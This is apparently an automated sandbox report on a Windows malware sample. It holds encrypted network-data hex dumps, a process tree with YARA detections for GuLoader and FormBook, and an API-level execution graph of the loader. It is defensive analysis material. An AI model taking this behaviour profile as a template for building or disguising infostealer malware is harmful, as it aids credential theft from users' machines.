                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: a0 0f ea d2 a0 92 71 6c 11 c4 b1 f9 69 c5 ba d2 fd e2 6f 30 b2 17 79 d9 4e b0 53 bf 65 eb b1 7a fc c7 70 d9 dd 42 22 de 91 bc 77 d8 12 7d 44 75 86 33 06 b4 7d e3 00 55 7b 7a 8b c6 41 2f 3c fb 7f 21 14 24 a2 b2 98 dd 05 f3 58 3f 1c 5d 4c 94 18 78 2b 89 58 56 10 57 c3 6b 1a 6f 70 26 f4 48 c2 bc d1 15 43 e3 c8 dd 7b e1 d0 51 19 0f 32 ba a8 56 14 42 af 13 0c 37 78 a0 2b b9 7e 05 0e e5 22 8d 75 00 0d a5 e0 b5 9a 49 29 95 d1 b9 4e 71 10 ed 37 de 7c 3f 03 9e 5f ea 41 6a 04 d1 7b ec 62 86 e8 a2 6e 98 10 52 aa 5c e4 68 2c 06 ed 33 fc 1f 46 9f 47 40 67 aa 9d 62 58 92 cc 0d e7 5b e7 9b 66 fd 96 da 28 f5 01 78 02 55 50 1a 8d b6 cc 8a 2c bf da c8 0a bf b8 6e 46 14 f9 1f ef b5 98 89 a4 1a 24 f4 85 15 26 e8 cf de d1 1e ec a0 79 db 0c 9e 1a 21 ab f4 b5 a5 09 0e fe eb ee
                                                                                                                                                                              Data Ascii: qlio0yNSezpB"w}Du3}U{zA/<!$X?]Lx+XVWkop&HC{Q2VB7x+~"uI)Nq7|?_Aj{bnR\h,3FG@gbX[f(xUP,nF$&y!
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: f8 21 43 e9 cd 55 7d 4d b3 91 5c d2 8a b2 ba e6 c4 e3 16 61 83 4f 7e 56 64 59 88 42 69 a8 36 b4 01 af 48 f5 9d 43 20 0a 1a bd da 83 fc 5a 84 9b 73 25 6e ba c9 75 bb 2f 06 b1 aa cc f2 b4 c2 f9 0f b5 1f 41 fa 26 c8 aa 25 cc f9 8f 55 37 ed b2 fd ed 83 4f 4c f0 fc 52 6d 9c d2 71 3b fa b1 a4 66 55 cf c3 8d be ab af 88 17 9d 84 9a e2 1f 76 02 bb 31 bf 45 e6 a0 75 09 47 ce 1f 98 95 f4 34 99 91 23 5d 82 99 50 24 63 1a b1 8a c6 df 60 df 64 bf ba 87 ad 1d 38 88 63 cf db d5 33 1e e0 90 2d 2c ce b7 cd 86 18 ee a9 21 e4 69 a2 9a 54 bb 16 46 05 b9 e9 5f 18 16 9c 56 50 d6 47 31 53 49 d8 14 f3 a8 ba b3 9a b7 6f 08 17 92 44 b9 7c c1 8a 39 a1 c3 6b 7b 34 c9 2d 76 ec f7 c8 38 01 0f 3c d4 32 8b 1c 28 ed 79 4c 6f bc 5d d7 38 f7 6f b1 19 2e b2 07 2d d8 14 ab 69 28 a7 7d af 52
                                                                                                                                                                              Data Ascii: !CU}M\aO~VdYBi6HC Zs%nu/A&%U7OLRmq;fUv1EuG4#]P$c`d8c3-,!iTF_VPG1SIoD|9k{4-v8<2(yLo]8o.-i(}R
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: b9 80 bb aa 52 7d fb 7d 05 1f d4 82 5e 15 f5 61 60 31 c9 bf ed 2c 27 c5 db 63 6c 55 de 84 01 6d d9 b7 01 33 ac dd 83 fc e3 31 28 c4 3a 8a 8e ce 7d 58 13 e0 07 05 47 b8 5a 0f 17 69 68 c1 68 d6 06 c2 7a 6a 66 42 23 8e 68 05 9a 42 36 ab c0 7e a0 c4 d3 e6 4f 23 e6 8b 5c 9f 8a c5 1a ce d7 e7 4e e4 55 88 36 aa 0d da 17 97 87 c4 94 e5 96 22 02 b1 8a 25 00 41 81 63 34 1e ee c9 12 38 68 fb 4b be 06 69 a3 e8 de 67 9f 20 b3 52 16 f6 e0 c5 ff 34 7e c1 f0 ec 11 86 17 3a 5a 5e 61 70 8d f4 d1 1d 44 bb f1 70 69 92 ec 62 b3 c2 89 c8 66 60 dc 59 ba a9 09 31 dd 74 45 27 5d c9 43 a3 5c 57 34 f1 bb b8 a4 f6 ed 03 27 6a 2b ff 51 00 c8 d8 59 10 14 dc cc f7 4b a4 2e ce 1a 48 1e 04 60 f2 2d 74 de 96 58 0f 1b f3 69 d7 00 83 62 5e b3 01 eb 6a 97 e2 34 cd 0c 98 ee 5d 58 6b 40 7d 5b
                                                                                                                                                                              Data Ascii: R}}^a`1,'clUm31(:}XGZihhzjfB#hB6~O#\NU6"%Ac48hKig R4~:Z^apDpibf`Y1tE']C\W4'j+QYK.H`-tXib^j4]Xk@}[
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: ea a2 34 ee 38 10 15 a6 a2 33 96 cb 75 62 8e a8 36 a2 fd 89 b2 c5 bf 10 9c 6f 40 9d b5 02 d0 12 96 67 38 99 3f 0a 76 1b 86 e7 cb ce 20 42 45 5d 8c 8a cf 9e 14 b4 5d e7 bc 40 13 a3 a6 97 5f 56 98 b2 9d 63 a8 40 50 17 ca 7f 20 5d 31 a7 3b c4 fb 15 97 ff 0a f3 04 4d 52 05 9f 29 53 7c cb d8 9b 21 cc 4e da be 4c 14 00 d8 2d 14 40 86 38 19 d3 f0 6b 2f 65 c8 a4 cc ba 09 d1 f6 dc 68 35 84 7e d1 fb ed 96 15 34 d7 74 ce a9 dc ee 11 7a 9f 8e ad b8 4d 4f c3 53 d3 81 9a 62 57 04 e3 f6 62 aa 4b e3 57 1e 57 60 56 68 49 84 ec 00 b9 80 36 5c cf 9c bc 68 85 19 9f 38 66 71 a8 22 da 51 ad 7a 5b 26 54 a1 02 d5 57 3b 67 75 a4 b5 c6 04 0f 43 e6 12 ac 2e 5c 9a b6 6d 4d 50 2f 7b 94 ba 91 ba 78 b0 07 4e 1b fe 59 52 d9 05 c6 87 96 d5 e6 a5 8b 8e 95 eb 4b b7 94 2c 27 48 a5 03 1d 2b
                                                                                                                                                                              Data Ascii: 483ub6o@g8?v BE]]@_Vc@P ]1;MR)S|!NL-@8k/eh5~4tzMOSbWbKWW`VhI6\h8fq"Qz[&TW;guC.\mMP/{xNYRK,'H+
                                                                                                                                                                              2025-01-11 02:54:05 UTC8000INData Raw: fb a5 82 f5 a4 02 21 23 e3 f7 15 de 8c a7 7f 47 14 75 b8 3e 49 14 1d d5 b4 5d 76 2a f9 fb bc 0f 61 3f a8 cf 4b 69 a5 0b 98 be 22 02 42 46 15 5c 97 a7 8e e7 a2 2e e8 3f c9 ec 7c 22 10 d4 b6 74 7b 27 0d 45 37 0a 5e 03 09 dc d7 82 cc b4 56 02 17 bd 0a 27 4f 15 0e ad 0d bc ec 4e be 14 40 99 db 03 48 48 2a 34 26 48 1e 14 a4 08 89 3b 5e db 71 68 7d ed b1 5e d5 99 21 de 79 56 89 db 8b 69 40 dd 4c 25 50 0c 4e 2b 13 ec 85 df 1d b9 b4 a8 5e a4 62 cf 4c 1e c3 1e 9e 28 55 fe ea 91 92 d2 9e d4 aa b6 12 3d c6 5d ae 9a a6 52 92 7c 09 fd 99 72 b9 d7 af 13 97 30 de ab 59 5c 4e f4 00 b9 28 fd 27 de 9d 91 13 64 a9 b1 d4 1c 64 b5 79 28 d2 19 c9 74 9a f3 13 2a 4b c1 cc 96 d1 ef 09 5f ff 48 59 53 f7 65 da 60 a6 79 fe 02 49 f7 c9 6e 6d d5 d8 3e 8d 21 3a 06 8c cb f2 6a ff ad b3
                                                                                                                                                                              Data Ascii: !#Gu>I]v*a?Ki"BF\.?|"t{'E7^V'ON@HH*4&H;^qh}^!yVi@L%PN+^bL(U=]R|r0Y\N('ddy(t*K_HYSe`yInm>!:j


                                                                                                                                                                              Statistics

                                                                                                                                                                              CPU Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Memory Usage

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Behavior

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              System Behavior

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:21:53:30
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\02Eh1ah35H.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5 hash:8B28F25BAFE08A5B838EE152A75D14AE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:21:53:56
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\02Eh1ah35H.exe"
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5 hash:8B28F25BAFE08A5B838EE152A75D14AE
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.28555602772.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:21:54:18
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:16'696'840 bytes
                                                                                                                                                                              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:21:54:19
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                              MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33482246521.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.33482135316.0000000004F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:21:54:50
                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                                                              Imagebase:0x7ff632280000
                                                                                                                                                                              File size:597'432 bytes
                                                                                                                                                                              MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:18.7%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:15.9%
                                                                                                                                                                                Total number of Nodes:1580
                                                                                                                                                                                Total number of Limit Nodes:32
                                                                                                                                                                                execution_graph 4024 6fdf29df 4025 6fdf2a2f 4024->4025 4026 6fdf29ef VirtualProtect 4024->4026 4026->4025 4027 401941 4028 401943 4027->4028 4033 402d3e 4028->4033 4034 402d4a 4033->4034 4078 40642b 4034->4078 4037 401948 4039 405b00 4037->4039 4120 405dcb 4039->4120 4042 405b28 DeleteFileW 4044 401951 4042->4044 4043 405b3f 4049 405c6a 4043->4049 4134 4063ee lstrcpynW 4043->4134 4046 405b65 4047 405b78 4046->4047 4048 405b6b lstrcatW 4046->4048 4135 405d0f lstrlenW 4047->4135 4050 405b7e 4048->4050 4049->4044 4163 40674c FindFirstFileW 4049->4163 4053 405b8e lstrcatW 4050->4053 4055 405b99 lstrlenW FindFirstFileW 4050->4055 4053->4055 4058 405c5f 4055->4058 4076 405bbb 4055->4076 4056 405c88 4166 405cc3 lstrlenW CharPrevW 4056->4166 4058->4049 4060 405c42 FindNextFileW 4064 405c58 FindClose 4060->4064 4060->4076 4061 405ab8 5 API calls 4063 405c9a 4061->4063 4065 405cb4 4063->4065 4066 405c9e 4063->4066 4064->4058 4068 405456 24 API calls 4065->4068 4066->4044 4069 405456 24 API calls 4066->4069 4068->4044 4071 405cab 4069->4071 4070 405b00 60 API calls 4070->4076 4073 4061b4 36 API calls 4071->4073 4072 405456 24 API calls 4072->4060 4074 405cb2 4073->4074 4074->4044 4076->4060 4076->4070 4076->4072 4139 4063ee lstrcpynW 4076->4139 4140 405ab8 4076->4140 4148 405456 4076->4148 4159 4061b4 MoveFileExW 4076->4159 4090 406438 4078->4090 4079 406683 4080 402d6b 4079->4080 4111 4063ee lstrcpynW 4079->4111 4080->4037 4095 40669d 4080->4095 4082 406651 lstrlenW 4082->4090 4085 40642b 10 API calls 4085->4082 4087 406566 GetSystemDirectoryW 4087->4090 4088 406579 GetWindowsDirectoryW 4088->4090 4089 40669d 5 API calls 4089->4090 4090->4079 4090->4082 4090->4085 4090->4087 4090->4088 4090->4089 4091 4065ad SHGetSpecialFolderLocation 4090->4091 4092 40642b 10 API calls 4090->4092 4093 4065f4 lstrcatW 4090->4093 4104 4062bc 4090->4104 4109 406335 wsprintfW 4090->4109 4110 4063ee lstrcpynW 4090->4110 4091->4090 4094 4065c5 SHGetPathFromIDListW CoTaskMemFree 4091->4094 4092->4090 4093->4090 4094->4090 4096 4066aa 4095->4096 4098 406713 CharNextW 4096->4098 4100 406720 4096->4100 4102 4066ff CharNextW 4096->4102 4103 40670e CharNextW 4096->4103 4116 405cf0 4096->4116 4097 406725 CharPrevW 4097->4100 4098->4096 4098->4100 4100->4097 4101 406746 4100->4101 4101->4037 4102->4096 4103->4098 4112 40625b 4104->4112 4107 4062f0 RegQueryValueExW RegCloseKey 4108 406320 4107->4108 4108->4090 4109->4090 4110->4090 4111->4080 4113 40626a 4112->4113 4114 406273 RegOpenKeyExW 4113->4114 4115 40626e 4113->4115 4114->4115 4115->4107 4115->4108 4117 405cf6 4116->4117 4118 405d0c 4117->4118 4119 405cfd CharNextW 4117->4119 4118->4096 4119->4117 4169 4063ee lstrcpynW 4120->4169 4122 405ddc 4170 405d6e CharNextW CharNextW 4122->4170 4125 405b20 4125->4042 4125->4043 4126 40669d 5 API calls 4132 405df2 4126->4132 4127 405e23 lstrlenW 4128 405e2e 4127->4128 4127->4132 4129 405cc3 3 API calls 4128->4129 4131 405e33 GetFileAttributesW 4129->4131 4130 40674c 2 API calls 4130->4132 4131->4125 4132->4125 4132->4127 4132->4130 4133 405d0f 2 API calls 4132->4133 4133->4127 4134->4046 4136 405d1d 4135->4136 4137 405d23 CharPrevW 4136->4137 4138 405d2f 4136->4138 4137->4136 4137->4138 4138->4050 4139->4076 4176 405ebf GetFileAttributesW 4140->4176 4143 405ae5 4143->4076 4144 405ad3 RemoveDirectoryW 4146 405ae1 4144->4146 4145 405adb DeleteFileW 4145->4146 4146->4143 4147 405af1 SetFileAttributesW 4146->4147 4147->4143 4149 405471 4148->4149 4157 405513 4148->4157 4150 40548d lstrlenW 4149->4150 4151 40642b 17 API calls 4149->4151 4152 4054b6 4150->4152 4153 40549b lstrlenW 4150->4153 4151->4150 4154 4054c9 4152->4154 4155 4054bc SetWindowTextW 4152->4155 4156 4054ad lstrcatW 4153->4156 4153->4157 4154->4157 4158 4054cf SendMessageW SendMessageW SendMessageW 4154->4158 4155->4154 4156->4152 4157->4076 4158->4157 4160 4061d5 4159->4160 4161 4061c8 4159->4161 4160->4076 4179 40603a 4161->4179 4164 406762 FindClose 4163->4164 4165 405c84 4163->4165 4164->4165 4165->4044 4165->4056 4167 405c8e 4166->4167 4168 405cdf lstrcatW 4166->4168 4167->4061 4168->4167 4169->4122 4171 405d8b 4170->4171 4174 405d9d 4170->4174 4172 405d98 CharNextW 4171->4172 4171->4174 4175 405dc1 4172->4175 4173 405cf0 CharNextW 4173->4174 4174->4173 4174->4175 4175->4125 4175->4126 4177 405ed1 SetFileAttributesW 4176->4177 4178 405ac4 4176->4178 4177->4178 4178->4143 4178->4144 4178->4145 4180 406090 GetShortPathNameW 4179->4180 4181 40606a 4179->4181 4183 4060a5 4180->4183 4184 4061af 4180->4184 4206 405ee4 GetFileAttributesW CreateFileW 4181->4206 4183->4184 4186 4060ad wsprintfA 4183->4186 4184->4160 4185 406074 CloseHandle GetShortPathNameW 4185->4184 4187 406088 4185->4187 4188 40642b 17 API calls 4186->4188 4187->4180 4187->4184 4189 4060d5 4188->4189 4207 405ee4 GetFileAttributesW CreateFileW 4189->4207 4191 4060e2 4191->4184 4192 4060f1 GetFileSize GlobalAlloc 4191->4192 4193 406113 4192->4193 4194 4061a8 CloseHandle 4192->4194 4208 405f67 ReadFile 4193->4208 4194->4184 4199 406132 lstrcpyA 4202 406154 4199->4202 4200 406146 4201 405e49 4 API calls 4200->4201 4201->4202 4203 40618b SetFilePointer 4202->4203 4215 405f96 WriteFile 4203->4215 4206->4185 4207->4191 4209 405f85 4208->4209 4209->4194 4210 405e49 lstrlenA 4209->4210 4211 405e8a lstrlenA 4210->4211 4212 405e92 4211->4212 4213 405e63 lstrcmpiA 4211->4213 4212->4199 4212->4200 4213->4212 4214 405e81 CharNextA 4213->4214 4214->4211 4216 405fb4 GlobalFree 4215->4216 4216->4194 4217 4015c1 4218 402d3e 17 API calls 4217->4218 4219 4015c8 4218->4219 4220 405d6e 4 API calls 4219->4220 4230 4015d1 4220->4230 4221 401631 4223 401663 4221->4223 4224 401636 4221->4224 4222 405cf0 CharNextW 4222->4230 4226 401423 24 API calls 4223->4226 4244 401423 4224->4244 4233 40165b 4226->4233 4230->4221 4230->4222 4234 401617 GetFileAttributesW 4230->4234 4236 4059bf 4230->4236 4239 405925 CreateDirectoryW 4230->4239 4248 4059a2 CreateDirectoryW 4230->4248 4232 40164a SetCurrentDirectoryW 4232->4233 4234->4230 4251 4067e3 GetModuleHandleA 4236->4251 4240 405972 4239->4240 4241 405976 GetLastError 4239->4241 4240->4230 4241->4240 4242 405985 SetFileSecurityW 4241->4242 4242->4240 4243 40599b GetLastError 4242->4243 4243->4240 4245 405456 24 API calls 4244->4245 4246 401431 4245->4246 4247 4063ee lstrcpynW 4246->4247 4247->4232 4249 4059b2 4248->4249 4250 4059b6 GetLastError 4248->4250 4249->4230 4250->4249 4252 406809 GetProcAddress 4251->4252 4253 4067ff 4251->4253 4255 4059c6 4252->4255 4257 406773 GetSystemDirectoryW 4253->4257 4255->4230 4256 406805 4256->4252 4256->4255 4258 406795 wsprintfW LoadLibraryExW 4257->4258 4258->4256 5025 402a42 5026 402d1c 17 API calls 5025->5026 5027 402a48 5026->5027 5028 402a88 5027->5028 5029 402a6f 5027->5029 5038 402925 5027->5038 5030 402aa2 5028->5030 5031 402a92 5028->5031 5032 402a74 5029->5032 5033 402a85 5029->5033 5035 40642b 17 API calls 5030->5035 5034 402d1c 17 API calls 5031->5034 5039 4063ee lstrcpynW 5032->5039 5040 406335 wsprintfW 5033->5040 5034->5038 5035->5038 5039->5038 5040->5038 5041 401c43 5042 402d1c 17 API calls 5041->5042 5043 401c4a 5042->5043 5044 402d1c 17 API calls 5043->5044 5045 401c57 5044->5045 5046 401c6c 5045->5046 5047 402d3e 17 API calls 5045->5047 5050 402d3e 17 API calls 5046->5050 5053 401c7c 5046->5053 5047->5046 5048 401cd3 5052 402d3e 17 API calls 5048->5052 5049 401c87 5051 402d1c 17 API calls 5049->5051 5050->5053 5054 401c8c 5051->5054 5055 401cd8 5052->5055 5053->5048 5053->5049 5056 402d1c 17 API calls 5054->5056 5057 402d3e 17 API calls 5055->5057 5058 401c98 5056->5058 5059 401ce1 FindWindowExW 5057->5059 5060 401cc3 SendMessageW 5058->5060 5061 401ca5 SendMessageTimeoutW 5058->5061 5062 401d03 5059->5062 5060->5062 5061->5062 5063 402b43 5064 4067e3 5 API calls 5063->5064 5065 402b4a 5064->5065 5066 402d3e 17 API calls 5065->5066 5067 402b53 5066->5067 5068 402b57 IIDFromString 5067->5068 5070 402b8e 5067->5070 5069 402b66 5068->5069 5068->5070 5069->5070 5073 4063ee lstrcpynW 5069->5073 5072 402b83 CoTaskMemFree 5072->5070 5073->5072 5074 6fdf18d9 5075 6fdf18fc 5074->5075 5076 6fdf1931 GlobalFree 5075->5076 5077 6fdf1943 5075->5077 5076->5077 5078 6fdf1272 2 API calls 5077->5078 5079 6fdf1ace GlobalFree GlobalFree 5078->5079 5080 402947 5081 402d3e 17 API calls 5080->5081 5082 402955 5081->5082 5083 40296b 5082->5083 5084 402d3e 17 API calls 5082->5084 5085 405ebf 2 API calls 5083->5085 5084->5083 5086 402971 5085->5086 5108 405ee4 GetFileAttributesW CreateFileW 5086->5108 5088 40297e 5089 402a21 5088->5089 5090 40298a GlobalAlloc 5088->5090 5093 402a29 DeleteFileW 5089->5093 5094 402a3c 5089->5094 5091 4029a3 5090->5091 5092 402a18 CloseHandle 5090->5092 5109 40345a SetFilePointer 5091->5109 5092->5089 5093->5094 5096 4029a9 5097 403444 ReadFile 5096->5097 5098 4029b2 GlobalAlloc 5097->5098 5099 4029c2 5098->5099 5100 4029f6 5098->5100 5101 40324c 31 API calls 5099->5101 5102 405f96 WriteFile 5100->5102 5107 4029cf 5101->5107 5103 402a02 GlobalFree 5102->5103 5104 40324c 31 API calls 5103->5104 5105 402a15 5104->5105 5105->5092 5106 4029ed GlobalFree 5106->5100 5107->5106 5108->5088 5109->5096 5110 6fdf1058 5112 6fdf1074 5110->5112 5111 6fdf10dd 5112->5111 5114 6fdf1092 5112->5114 5123 6fdf1516 5112->5123 5115 6fdf1516 GlobalFree 5114->5115 5116 6fdf10a2 5115->5116 5117 6fdf10a9 GlobalSize 5116->5117 5118 6fdf10b2 5116->5118 5117->5118 5119 6fdf10c7 5118->5119 5120 6fdf10b6 GlobalAlloc 5118->5120 5122 6fdf10d2 GlobalFree 5119->5122 5121 6fdf153d 3 API calls 5120->5121 5121->5119 5122->5111 5124 6fdf151c 5123->5124 5125 6fdf1522 5124->5125 5126 6fdf152e GlobalFree 5124->5126 5125->5114 5126->5114 5127 4053ca 5128 4053da 5127->5128 5129 4053ee 5127->5129 5130 4053e0 5128->5130 5139 405437 5128->5139 5131 4053f6 IsWindowVisible 5129->5131 5137 40540d 5129->5137 5134 404390 SendMessageW 5130->5134 5132 405403 5131->5132 5131->5139 5140 404cff SendMessageW 5132->5140 5133 40543c CallWindowProcW 5136 4053ea 5133->5136 5134->5136 5137->5133 5145 404d7f 5137->5145 5139->5133 5141 404d22 GetMessagePos ScreenToClient SendMessageW 5140->5141 5142 404d5e SendMessageW 5140->5142 5143 404d56 5141->5143 5144 404d5b 5141->5144 5142->5143 5143->5137 5144->5142 5154 4063ee lstrcpynW 5145->5154 5147 404d92 5155 406335 wsprintfW 5147->5155 5149 404d9c 5150 40140b 2 API calls 5149->5150 5151 404da5 5150->5151 5156 4063ee lstrcpynW 5151->5156 5153 404dac 5153->5139 5154->5147 5155->5149 5156->5153 5160 6fdf16d4 5161 6fdf1703 5160->5161 5162 6fdf1b5f 22 API calls 5161->5162 5163 6fdf170a 5162->5163 5164 6fdf171d 5163->5164 5165 6fdf1711 5163->5165 5166 6fdf1727 5164->5166 5167 6fdf1744 5164->5167 5168 6fdf1272 2 API calls 5165->5168 5169 6fdf153d 3 API calls 5166->5169 5170 6fdf176e 5167->5170 5171 6fdf174a 5167->5171 5172 6fdf171b 5168->5172 5173 6fdf172c 5169->5173 5175 6fdf153d 3 API calls 5170->5175 5174 6fdf15b4 3 API calls 5171->5174 5176 6fdf15b4 3 API calls 5173->5176 5177 6fdf174f 5174->5177 5175->5172 5178 6fdf1732 5176->5178 5179 6fdf1272 2 API calls 5177->5179 5180 6fdf1272 2 API calls 5178->5180 5181 6fdf1755 GlobalFree 5179->5181 5182 6fdf1738 GlobalFree 5180->5182 5181->5172 5183 6fdf1769 GlobalFree 5181->5183 5182->5172 5183->5172 5184 4016cc 5185 402d3e 17 API calls 5184->5185 5186 4016d2 GetFullPathNameW 5185->5186 5187 4016ec 5186->5187 5193 40170e 5186->5193 5190 40674c 2 API calls 5187->5190 5187->5193 5188 402bc2 5189 401723 GetShortPathNameW 5189->5188 5191 4016fe 5190->5191 5191->5193 5194 4063ee lstrcpynW 5191->5194 5193->5188 5193->5189 5194->5193 5195 401e4e GetDC 5196 402d1c 17 API calls 5195->5196 5197 401e60 GetDeviceCaps MulDiv ReleaseDC 5196->5197 5198 402d1c 17 API calls 5197->5198 5199 401e91 5198->5199 5200 40642b 17 API calls 5199->5200 5201 401ece CreateFontIndirectW 5200->5201 5202 402630 5201->5202 5203 402acf 5204 402d1c 17 API calls 5203->5204 5205 402ad5 5204->5205 5206 402b12 5205->5206 5207 402ae7 5205->5207 5208 402925 5205->5208 5206->5208 5209 40642b 17 API calls 5206->5209 5207->5208 5211 406335 wsprintfW 5207->5211 5209->5208 5211->5208 4731 4020d0 4732 4020e2 4731->4732 4733 402194 4731->4733 4734 402d3e 17 API calls 4732->4734 4736 401423 24 API calls 4733->4736 4735 4020e9 4734->4735 4737 402d3e 17 API calls 4735->4737 4741 4022ee 4736->4741 4738 4020f2 4737->4738 4739 402108 LoadLibraryExW 4738->4739 4740 4020fa GetModuleHandleW 4738->4740 4739->4733 4742 402119 4739->4742 4740->4739 4740->4742 4754 406852 4742->4754 4745 402163 4747 405456 24 API calls 4745->4747 4746 40212a 4748 402132 4746->4748 4749 402149 4746->4749 4750 40213a 4747->4750 4751 401423 24 API calls 4748->4751 4759 6fdf1777 4749->4759 4750->4741 4752 402186 FreeLibrary 4750->4752 4751->4750 4752->4741 4801 406410 WideCharToMultiByte 4754->4801 4756 40686f 4757 406876 GetProcAddress 4756->4757 4758 402124 4756->4758 4757->4758 4758->4745 4758->4746 4760 6fdf17aa 4759->4760 4802 6fdf1b5f 4760->4802 4762 6fdf17b1 4763 6fdf18d6 4762->4763 4764 6fdf17c9 4762->4764 4765 6fdf17c2 4762->4765 4763->4750 4836 6fdf23e0 4764->4836 4852 6fdf239e 4765->4852 4770 6fdf180f 4865 6fdf25b5 4770->4865 4771 6fdf182d 4775 6fdf187e 4771->4775 4776 6fdf1833 4771->4776 4772 6fdf17df 4781 6fdf17e5 4772->4781 4782 6fdf17f0 4772->4782 4773 6fdf17f8 4785 6fdf17ee 4773->4785 4862 6fdf2d83 4773->4862 4779 6fdf25b5 10 API calls 4775->4779 4884 6fdf15c6 4776->4884 4786 6fdf186f 4779->4786 4780 6fdf1815 4876 6fdf15b4 4780->4876 4781->4785 4846 6fdf2af8 4781->4846 4856 6fdf2770 4782->4856 4785->4770 4785->4771 4792 6fdf18c5 4786->4792 4890 6fdf2578 4786->4890 4789 6fdf17f6 4789->4785 4790 6fdf25b5 10 API calls 4790->4786 4792->4763 4794 6fdf18cf GlobalFree 4792->4794 4794->4763 4798 6fdf18b1 4798->4792 4894 6fdf153d wsprintfW 4798->4894 4800 6fdf18aa FreeLibrary 4800->4798 4801->4756 4897 6fdf121b GlobalAlloc 4802->4897 4804 6fdf1b86 4898 6fdf121b GlobalAlloc 4804->4898 4806 6fdf1dcb GlobalFree GlobalFree GlobalFree 4807 6fdf1de8 4806->4807 4827 6fdf1e32 4806->4827 4809 6fdf21de 4807->4809 4815 6fdf1dfd 4807->4815 4807->4827 4808 6fdf1c86 GlobalAlloc 4825 6fdf1b91 4808->4825 4810 6fdf2200 GetModuleHandleW 4809->4810 4809->4827 4813 6fdf2226 4810->4813 4814 6fdf2211 LoadLibraryW 4810->4814 4811 6fdf1cd1 lstrcpyW 4817 6fdf1cdb lstrcpyW 4811->4817 4812 6fdf1cef GlobalFree 4812->4825 4905 6fdf161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4813->4905 4814->4813 4814->4827 4815->4827 4901 6fdf122c 